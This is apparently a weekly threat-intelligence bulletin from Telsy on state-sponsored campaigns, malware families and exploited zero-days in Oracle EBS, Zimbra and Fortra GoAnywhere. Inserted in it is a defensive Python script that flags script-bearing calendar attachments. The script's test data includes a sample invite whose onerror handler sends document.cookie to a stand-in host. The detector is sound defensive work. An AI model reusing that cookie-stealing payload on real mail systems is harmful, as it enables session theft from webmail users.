APTs between East and West, malware news, three 0-days exploited in malicious campaigns

APT: State-sponsored campaigns detected around the globe
This week, multiple campaigns by various state-sponsored adversaries were tracked worldwide. In Russia, the Sandworm subgroup known as Seashell Blizzard targeted critical infrastructure in Ukraine and Europe in the agricultural, defense, transportation, and manufacturing sectors. Using phishing emails, the attacker distributed XLL attachments with embedded ExcelDNA code containing custom malware called CheapShot, which downloaded and launched a secondary payload named ShroudDoor. The Lunar Spider group, for its part, used fake CAPTCHAs to target the European financial sector, delivering the Latrodectus loader to gather information on the network and facilitate data theft, lateral movement, and the potential deployment of ransomware in collaboration with groups such as ALPHV Team and FIN6. Also in Russia, Cavalry Werewolf launched a targeted campaign against government agencies and companies in the country’s energy, mining, and manufacturing sectors; the adversary, posing as Kyrgyz government officials, delivered custom malware such as FoalShell and StallionRAT. Moving eastward, an alleged China-linked cyberespionage campaign targeted a Serbian government department dealing with aviation, as well as other European institutions in Italy, Hungary, Belgium, and the Netherlands; analysis revealed a connection to infrastructure associated with PlugX and to files and artifacts linked to UNC6384, presumably associated with Mustang Panda. Finally, the Indian APT Dropping Elephant evolved its TTPs and conducted three spear-phishing campaigns against Pakistan, using weaponized Office documents, malicious LNK files, and malware families such as WooperStealer and the Python variant of a backdoor called AnonDoor.
Malware: from new tools to the reappearance of some already known ones
In an active campaign called Water Saci, malware nicknamed SORVEPOTEL was spread, mainly against financial institutions and cryptocurrency exchanges in the Brazilian market; it is characterized by its ability to propagate automatically on WhatsApp by sending malicious ZIP files to all contacts of the compromised account. Elsewhere, a Vietnamese group called BatShadow targeted job seekers and digital marketing professionals in order to spread a previously unknown malicious executable called Vampire Bot, designed to steal sensitive information, monitor activity, and maintain long-term access to infected systems. The well-known WarmCookie backdoor, still in active use, has gained new features: recent versions add handlers to execute PE files, DLLs, and PowerShell scripts, along with additional evasion techniques and more robust synchronization mechanisms. Another innovation is the addition of a field called “campaign ID,” which allows attackers to track and differentiate their campaigns and distribution methods. Finally, the XWorm backdoor has reemerged in phishing campaigns in its 6.0, 6.4, and 6.5 variants, with over 35 supported plugins that extend its capabilities from stealing sensitive information to ransomware activity.
0-day: Oracle, Fortra, and Zimbra vulnerabilities exploited
Three zero-day vulnerabilities were exploited in various malicious operations. Oracle released an advisory to fix CVE-2025-61882, a vulnerability affecting Oracle Concurrent Processing in Oracle E-Business Suite (EBS), specifically in the BI Publisher Integration component, which was exploited in the extortion campaign attributed to TA505. The operation followed months of targeted intrusions, with exploitation activity beginning on August 9, 2025, and additional suspicious activity dating back to July 10. News of this vulnerability was first reported by Scattered Lapsus$ Hunters (SLH), which disclosed two files on Telegram on Friday, October 3, including an exploit for the CVE. According to the investigation, some of the artifacts observed in July match the exploit disclosed by SLH; however, there is insufficient evidence to confirm the cybercrime group’s involvement in the campaign. Zimbra, for its part, fixed a zero-day vulnerability in Zimbra Collaboration Suite (ZCS), tracked as CVE-2025-27915, that had been used in attacks in early January, before the patch was released. Specifically, an attacker spoofing the Libyan Navy’s Office of Protocol sent an email to a Brazilian military organization carrying an ICS attachment with embedded JavaScript code, in effect a complete data stealer targeting Zimbra Webmail. It is currently unclear who is behind the attack, but similarities have been identified with the TTPs of Sofacy and Ghostwriter. Finally, the critical vulnerability CVE-2025-10035 in Fortra GoAnywhere MFT has been exploited as a zero-day since September 10 in activity attributed to the financially motivated group Storm-1175, known for distributing the Medusa ransomware.
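The Zimbra case above relies on a calendar (.ics) attachment whose text properties carry HTML with script content. As an added example (constructed for this page, not code from Telsy's report or from Zimbra), the following Python triage check unfolds an ICS file per RFC 5545, walks its properties, and flags any value containing script tags, javascript: URLs, inline event handlers, or active-content tags. The two sample invites, the host example.invalid, and the pattern list are assumptions made for illustration; a mail gateway could run this over calendar attachments before delivery.

```python
"""Triage check: flag calendar (.ics) attachments carrying embedded HTML/JavaScript.

Added example with constructed inputs; not the report's or Zimbra's own code.
"""
import re

# Patterns that have no business in a benign invite's text properties (assumed list).
SCRIPT_PATTERNS = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("javascript-url", re.compile(r"javascript\s*:", re.I)),
    # an on* event handler attribute inside a tag, e.g. <img src=x onerror=...>
    ("event-handler", re.compile(r"<[^>]*\son[a-z]+\s*=", re.I)),
    ("active-content-tag", re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I)),
]


def unfold_ics(text):
    """Join RFC 5545 folded lines: a continuation line starts with a space or tab."""
    return re.sub(r"\r?\n[ \t]", "", text)


def iter_properties(text):
    """Yield (NAME, value) for each content line.

    Parameters after ';' are dropped from the name. Quoted parameter values
    containing ':' are not handled, which is acceptable for a triage pass.
    """
    for line in unfold_ics(text).splitlines():
        if ":" not in line:
            continue
        head, _, value = line.partition(":")
        name = head.split(";", 1)[0].strip().upper()
        yield name, value


def scan_ics(text):
    """Return a list of (property_name, pattern_label) findings; [] means clean."""
    findings = []
    for name, value in iter_properties(text):
        for label, pattern in SCRIPT_PATTERNS:
            if pattern.search(value):
                findings.append((name, label))
                break  # one finding per property is enough for triage
    return findings


# Constructed sample: an ordinary invite.
BENIGN_ICS = """BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//constructed//example//EN
BEGIN:VEVENT
UID:constructed-001
DTSTART:20250110T090000Z
SUMMARY:Quarterly review
DESCRIPTION:Agenda attached\\, see you on Monday.
END:VEVENT
END:VCALENDAR
"""

# Constructed sample: an HTML description with an inline handler, split across a folded line.
MALICIOUS_ICS = """BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//constructed//example//EN
BEGIN:VEVENT
UID:constructed-002
DTSTART:20250110T090000Z
SUMMARY:Protocol meeting
X-ALT-DESC;FMTTYPE=text/html:<html><body><img src=x onerror="fetch('ht
 tps://example.invalid/'+document.cookie)"></body></html>
END:VEVENT
END:VCALENDAR
"""


def triage(samples):
    """Map a sample label to its findings, the shape a gateway log entry would carry."""
    return {label: scan_ics(text) for label, text in samples.items()}


if __name__ == "__main__":
    for label, hits in triage({"benign": BENIGN_ICS, "suspicious": MALICIOUS_ICS}).items():
        print(label, "->", hits or "clean")
```

The unfolding step matters: a payload can be split across continuation lines so that no single raw line matches a naive grep, which is why the check normalizes the file before matching. Treat a hit as a reason to quarantine the attachment for review rather than as proof of exploitation; the decisive mitigation is applying the ZCS patch.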
Weekly Threats Report is Telsy’s weekly update on the latest developments regarding cyberattacks and threat actors worldwide, produced by our Threat Intelligence & Response team.
The team is made up of security analysts and researchers with both technical and investigative expertise, as well as recognized international experience.
Through continuous monitoring of cyber threats and geopolitical events, it produces and provides organizations with valuable information to anticipate attacks and understand their impact, while ensuring a reliable partner in the event of a cyber incident.